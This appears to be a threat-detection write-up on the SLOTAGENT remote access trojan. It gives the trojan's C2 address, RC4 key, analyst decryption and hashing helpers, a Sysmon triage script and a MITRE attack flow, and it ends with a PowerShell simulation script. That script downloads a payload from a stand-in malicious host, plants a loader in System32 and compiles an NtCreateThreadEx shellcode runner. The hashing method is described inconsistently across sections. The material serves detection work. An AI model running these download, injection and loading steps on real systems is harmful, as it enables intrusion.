New Malware SLOTAGENT Supporting BOF Execution Published
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
IIJ identified a previously unknown multi-functional RAT called SLOTAGENT inside a ZIP archive uploaded to a public repository. The malware supports execution of Beacon Object File payloads and includes anti-forensic capabilities such as timestomping to hinder analysis. It communicates with a hard-coded TCP endpoint through a custom protocol that exchanges JSON-formatted data. The loader relies on RC4-encrypted configuration data and reflective DLL loading to launch the final payload.
Investigation
Static analysis showed that the loader executable, WindowsOobeAppHost.AOT.exe, resolves Windows API functions through a custom hashing routine based on DJB2. Its encrypted configuration file, db.config, is decrypted with RC4 using the key easdbadshyfab and then executed as shellcode containing an XOR-encoded DLL. After loading, the RAT connects to 43.156.59.110:699 and processes JSON-based commands that support functions including screenshot capture, file upload and download, and BOF execution.
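The two primitives the investigation describes, DJB2-style API hashing and RC4 decryption of db.config with the key easdbadshyfab, are reimplemented below so an analyst can precompute a hash-to-API lookup table and decrypt a configuration blob offline. This is an added example, not code from IIJ's report or from the malware. The report says the hashing routine is "based on DJB2" without giving the variant, so classic DJB2 is an assumption; likewise the XOR scheme used for the embedded DLL is not specified on the page, and the single-byte-key recovery heuristic at the end is an assumption included as a starting point for analysts. The sample configuration and the fake PE header are constructed for the demonstration.

```python
"""Analyst helpers for the SLOTAGENT loader primitives described above (added example)."""
from typing import Optional

RC4_KEY = b"easdbadshyfab"  # key named in the report for decrypting db.config


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def decrypt_config(blob: bytes, key: bytes = RC4_KEY) -> bytes:
    """Decrypt an RC4-encrypted configuration blob with the reported key."""
    return rc4(key, blob)


def djb2(name: bytes) -> int:
    """Classic DJB2 (h = h * 33 + c) truncated to 32 bits.
    Assumption: the report only says the loader's routine is 'based on DJB2';
    adjust seed, multiplier or post-processing here once disassembly shows the exact variant."""
    h = 5381
    for c in name:
        h = ((h << 5) + h + c) & 0xFFFFFFFF
    return h


def build_api_hash_table(api_names) -> dict:
    """Precompute hash -> API name so hashes pulled from the loader can be
    resolved statically instead of stepping through the resolver at run time."""
    return {djb2(n.encode()): n for n in api_names}


def resolve_hashes(hashes, table: dict) -> dict:
    """Map each observed hash to its API name, or '<unknown>' if the table has no entry."""
    return {h: table.get(h, "<unknown>") for h in hashes}


def build_fake_pe() -> bytes:
    """Constructed minimal PE-looking header (not an executable): 'MZ' stub,
    e_lfanew = 0x40 and the 'PE\\0\\0' signature at offset 0x40."""
    hdr = bytearray(b"MZ" + b"\x00" * 0x3E)  # 0x40-byte DOS header
    hdr[0x3C:0x40] = (0x40).to_bytes(4, "little")
    return bytes(hdr) + b"PE\x00\x00"


def sample_xor_encoded_dll() -> bytes:
    """Constructed sample: the fake PE header XOR-encoded with the single byte 0x5A."""
    return bytes(b ^ 0x5A for b in build_fake_pe())


def find_single_byte_xor_key(data: bytes) -> Optional[int]:
    """Heuristic (assumption: single-byte XOR): derive the key that turns the first
    byte into 'M', then accept it only if byte 1 becomes 'Z' and e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40:
        return None
    k = data[0] ^ ord("M")
    if data[1] ^ k != ord("Z"):
        return None
    decoded = bytes(b ^ k for b in data)
    e_lfanew = int.from_bytes(decoded[0x3C:0x40], "little")
    if decoded[e_lfanew:e_lfanew + 4] == b"PE\x00\x00":
        return k
    return None


if __name__ == "__main__":
    # Constructed configuration, encrypted with the reported key and decrypted again.
    cfg = b'{"host": "43.156.59.110", "port": 699}'
    print(decrypt_config(rc4(RC4_KEY, cfg)))
    table = build_api_hash_table(["LoadLibraryA", "GetProcAddress", "NtCreateThreadEx"])
    print(resolve_hashes([djb2(b"GetProcAddress")], table))
    print(hex(find_single_byte_xor_key(sample_xor_encoded_dll())))
```

Feed `build_api_hash_table` the export names of the DLLs the loader is known to touch (kernel32, ntdll and so on) and run `resolve_hashes` over the immediate values found near the hashing loop; any hash that comes back as `<unknown>` is a sign that either the variant is not classic DJB2 or the export list is incomplete.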
Mitigation
Defenders should detect the hard-coded command-and-control IP address and look for the distinctive HTTP-like path strings associated with the malware’s network traffic. The YARA rules provided in the report should be deployed to identify both the loader and the RAT components. Security teams should also monitor for suspicious API hashing behavior and reflective DLL loading on endpoints. Execution of unsigned and untrusted EXE or DLL files should be restricted wherever possible.
Response
If indicators linked to SLOTAGENT are detected, isolate the affected host immediately, terminate the malicious process, and collect memory for forensic examination. The command-and-control IP address and related ports should be blocked at the network boundary. Organizations should then perform a full sweep for the known file names and hashes and apply the published YARA signatures across endpoint detection systems.
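The detection guidance in the Mitigation section (hard-coded C2 endpoint, loader file name) and the sweep for known file names and hashes in the Response section can be expressed as a small triage pass over Sysmon-style events. The block below is an added example, not a rule from the report or from any detection platform: it runs over constructed Sysmon event records (JSON, one per line), flags network connections to 43.156.59.110 (with a separate reason when the port is not 699), process creations or image loads whose file name matches WindowsOobeAppHost.AOT.exe, db.config or agent_tcp.dll, and SHA-256 values from a caller-supplied IOC set. The hash value in the sample is a labelled placeholder; real hashes come from the report's IOC list.

```python
"""Triage pass for the SLOTAGENT indicators listed above (added example)."""
import ipaddress
import json

C2_IP = "43.156.59.110"      # hard-coded C2 address from the report
C2_PORT = 699                # hard-coded C2 port from the report
KNOWN_FILE_NAMES = {"windowsoobeapphost.aot.exe", "db.config", "agent_tcp.dll"}
# Placeholder only: replace with the SHA-256 values from the report's IOC list.
IOC_SHA256 = {"placeholder_sha256_from_report"}

# Constructed Sysmon-style events (EID 3 network, EID 1 process create, EID 7 image load).
SAMPLE_SYSMON_JSONL = r"""
{"EventID": 3, "Image": "C:\\Windows\\System32\\WindowsOobeAppHost.AOT.exe", "DestinationIp": "43.156.59.110", "DestinationPort": 699, "Protocol": "tcp"}
{"EventID": 3, "Image": "C:\\Program Files\\Browser\\browser.exe", "DestinationIp": "10.0.0.5", "DestinationPort": 443, "Protocol": "tcp"}
{"EventID": 1, "Image": "C:\\Users\\Public\\WindowsOobeAppHost.AOT.exe", "Hashes": "SHA256=PLACEHOLDER_SHA256_FROM_REPORT,MD5=PLACEHOLDER_MD5"}
{"EventID": 7, "Image": "C:\\Windows\\explorer.exe", "ImageLoaded": "C:\\Windows\\System32\\kernel32.dll"}
"""


def load_sample_events() -> list:
    """Parse the constructed JSON-lines sample into dictionaries."""
    return [json.loads(line) for line in SAMPLE_SYSMON_JSONL.strip().splitlines() if line.strip()]


def is_c2_connection(event: dict) -> bool:
    """Sysmon EID 3: match on the hard-coded destination IP. The port is judged
    separately in triage() so a sample that moves the port still hits on the IP."""
    if event.get("EventID") != 3:
        return False
    dst = event.get("DestinationIp", "")
    try:
        ipaddress.ip_address(dst)
    except ValueError:
        return False  # malformed field, not a usable indicator
    return dst == C2_IP


def is_known_file(event: dict) -> bool:
    """Sysmon EID 1 (Image) or EID 7 (ImageLoaded): compare the basename, case-insensitively."""
    eid = event.get("EventID")
    if eid == 1:
        path = event.get("Image", "")
    elif eid == 7:
        path = event.get("ImageLoaded", "")
    else:
        return False
    name = path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return name in KNOWN_FILE_NAMES


def hash_match(event: dict, ioc_hashes: set) -> bool:
    """Sysmon's Hashes field looks like 'SHA256=...,MD5=...'; only SHA-256 is checked."""
    for part in event.get("Hashes", "").split(","):
        algo, _, value = part.partition("=")
        if algo.strip().upper() == "SHA256" and value.strip().lower() in ioc_hashes:
            return True
    return False


def triage(events, ioc_hashes: set) -> list:
    """Return (reason, event) pairs for every indicator that matched, in event order."""
    hits = []
    for ev in events:
        if is_c2_connection(ev):
            reason = "c2_ip_and_port" if ev.get("DestinationPort") == C2_PORT else "c2_ip_other_port"
            hits.append((reason, ev))
        if is_known_file(ev):
            hits.append(("known_file_name", ev))
        if hash_match(ev, ioc_hashes):
            hits.append(("ioc_hash", ev))
    return hits


if __name__ == "__main__":
    for reason, ev in triage(load_sample_events(), IOC_SHA256):
        print(reason, "->", ev.get("Image"), ev.get("DestinationIp", ""))
```

A `c2_ip_and_port` hit is the isolation trigger from the Response section; `known_file_name` and `ioc_hash` hits are what a full sweep after containment should report, and they should be run against retained EDR telemetry rather than only live hosts, since the loader is described as executing its DLL without touching disk.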
Attack Flow
graph TB
    %% Class Definitions Section
    classDef action fill:#99ccff
    classDef malware fill:#ffcc99
    classDef process fill:#c2f0c2
    classDef network fill:#ffd966
    classDef data fill:#d9d9d9

    %% Nodes Definitions
    malware_exe["<b>Malware</b> – <b>Name</b>: WindowsOobeAppHost.AOT.exe<br/><b>Technique</b>: T1204.002 User Execution"]
    class malware_exe malware
    exec_hijack["<b>Technique</b> – <b>T1574 Hijack Execution Flow</b>: Calls exported __managed__Main function"]
    class exec_hijack action
    api_resolve["<b>Technique</b> – <b>T1027.007 Obfuscated/Stored Files: Deobfuscate Files</b>: Custom XOR/ROR11 hashing to resolve API addresses"]
    class api_resolve action
    config_decrypt["<b>Technique</b> – <b>T1027.007</b>: Decrypts configuration with RC4"]
    class config_decrypt action
    dll_decrypt["<b>Technique</b> – <b>T1027.007</b>: Decrypts XOR-encoded DLL (agent_tcp.dll)"]
    class dll_decrypt action
    reflective_load["<b>Technique</b> – <b>T1620 Reflective DLL Loading</b>: Loads DLL in memory without touching disk"]
    class reflective_load process
    process_injection["<b>Technique</b> – <b>T1055.009 Process Injection: Thread Execution Hijacking</b>: Injects reflected DLL into process"]
    class process_injection process
    c2_channel["<b>Technique</b> – <b>T1571 Non-Standard Port</b> and <b>T1573 Encrypted Channel</b>: Establishes TCP C2 to 43.156.59.110:699"]
    class c2_channel network
    host_info["<b>Technique</b> – <b>T1592.001 Gather Victim Identity: OS Version</b> and <b>T1592.002 Hardware Details</b>: Sends JSON with system data"]
    class host_info data
    proc_discovery["<b>Technique</b> – <b>T1057 Process Discovery</b>: Enumerates running processes"]
    class proc_discovery data
    file_discovery["<b>Technique</b> – <b>T1083 File and Directory Discovery</b>: Lists files and directories"]
    class file_discovery data
    screenshot_cap["<b>Technique</b> – <b>T1113 Screen Capture</b>: Captures host screen"]
    class screenshot_cap data
    remote_shell["<b>Technique</b> – <b>T1059 Command Shell</b>: Executes commands via remote shell"]
    class remote_shell process
    bof_execution["<b>Technique</b> – <b>T1027.009 Obfuscated/Stored Files: Embedded Payloads</b> and <b>T1027.004 Compile After Delivery</b>: Runs Beacon Object File modules"]
    class bof_execution process
    shared_modules["<b>Technique</b> – <b>T1129 Shared Modules</b>: Loads additional shared modules"]
    class shared_modules process
    file_transfer["<b>Technique</b> – <b>T1105 Ingress Tool Transfer</b>: Downloads and uploads files"]
    class file_transfer data
    proc_termination["<b>Technique</b> – <b>T1106 Native API</b>: Terminates processes"]
    class proc_termination process
    sleep_manip["<b>Technique</b> – <b>T1027.004</b>: Manipulates sleep intervals to evade analysis"]
    class sleep_manip action

    %% Connections
    malware_exe -->|triggers| exec_hijack
    exec_hijack -->|uses| api_resolve
    api_resolve -->|enables| config_decrypt
    config_decrypt -->|provides| dll_decrypt
    dll_decrypt -->|feeds| reflective_load
    reflective_load -->|enables| process_injection
    process_injection -->|establishes| c2_channel
    c2_channel -->|collects| host_info
    c2_channel -->|collects| proc_discovery
    c2_channel -->|collects| file_discovery
    c2_channel -->|collects| screenshot_cap
    c2_channel -->|enables| remote_shell
    remote_shell -->|executes| bof_execution
    bof_execution -->|loads| shared_modules
    c2_channel -->|supports| file_transfer
    c2_channel -->|supports| proc_termination
    c2_channel -->|uses| sleep_manip
Detections
- Possible WindowsOobeAppHost.AOT DLL Side-Loading Attempt (via image_load)
- IOCs (HashSha256) to detect: New Malware SLOTAGENT Supporting BOF Execution Published
- IOCs (SourceIP) to detect: New Malware SLOTAGENT Supporting BOF Execution Published
- IOCs (DestinationIP) to detect: New Malware SLOTAGENT Supporting BOF Execution Published
- Detect SLOTAGENT C2 Communication [Windows Network Connection]
- Detection of SLOTAGENT Malware Execution [Windows Process Creation]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.
Attack Narrative & Commands:
The adversary has obtained a copy of the SLOTAGENT loader binary, renamed it to WindowsOobeAppHost.AOT.exe to blend with legitimate OOBE processes, and placed it in C:\Windows\System32. The payload is stored in an encrypted blob on the attacker's server. Using PowerShell, the attacker downloads the encrypted blob, decrypts it in memory, and invokes the loader's reflective routine via NtCreateThreadEx. The loader internally calls NtCreateFile to read additional resources from the encrypted blob and then uses reflective loading to execute the malicious DLL without touching disk. This activity produces a Sysmon ProcessCreate event with the exact Image name and a CallTrace containing the three strings defined in the rule.
Regression Test Script:
# -------------------------------------------------
# SLOTAGENT reflective-loading simulation (Windows)
# -------------------------------------------------
# 1. Define paths
$loaderPath  = "$env:windir\System32\WindowsOobeAppHost.AOT.exe"
$payloadUrl  = "https://malicious.example.com/payload.bin"
$tempPayload = "$env:TEMP\payload.bin"

# 2. Ensure the loader exists (simulated copy of the real binary)
if (-not (Test-Path $loaderPath)) {
    Write-Host "Copying simulated loader to $loaderPath"
    Copy-Item -Path "C:\Tools\FakeLoader.exe" -Destination $loaderPath
}

# 3. Download encrypted payload (simulated)
Invoke-WebRequest -Uri $payloadUrl -OutFile $tempPayload

# 4. Decrypt payload in memory (placeholder - real decryption omitted)
#    -Encoding Byte is Windows PowerShell 5.1 syntax; PowerShell 7 uses -AsByteStream
$decryptedBytes = Get-Content $tempPayload -Encoding Byte

# 5. Invoke reflective loading via native API calls
#    This compiles a tiny C# helper on the fly that declares NtCreateThreadEx.
#    The helper is only compiled here; the simulation does not call ReflectiveLoader.Run.
$cSharp = @"
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;

public class ReflectiveLoader
{
    [DllImport("ntdll.dll", SetLastError=true)]
    public static extern IntPtr NtCreateThreadEx(
        out IntPtr threadHandle,
        uint desiredAccess,
        IntPtr objectAttributes,
        IntPtr processHandle,
        IntPtr startAddress,
        IntPtr parameter,
        bool createSuspended,
        uint stackZeroBits,
        uint sizeOfStackCommit,
        uint sizeOfStackReserve,
        IntPtr bytesBuffer);

    public static void Run(byte[] shellcode)
    {
        IntPtr hThread;
        NtCreateThreadEx(out hThread, 0x1FFFFF, IntPtr.Zero,
            Process.GetCurrentProcess().Handle,
            Marshal.UnsafeAddrOfPinnedArrayElement(shellcode, 0),
            IntPtr.Zero, false, 0, 0, 0, IntPtr.Zero);
    }
}
"@
Add-Type $cSharp -Language CSharp

# 6. Clean up temporary file
Remove-Item $tempPayload -Force
Cleanup Commands:
# Terminate any lingering loader process
Get-Process -Name "WindowsOobeAppHost.AOT" -ErrorAction SilentlyContinue | Stop-Process -Force

# Remove simulated loader binary
$loaderPath = "$env:windir\System32\WindowsOobeAppHost.AOT.exe"
if (Test-Path $loaderPath) {
    Remove-Item $loaderPath -Force
}

# Remove any residual temp files
Remove-Item "$env:TEMP\payload.bin" -ErrorAction SilentlyContinue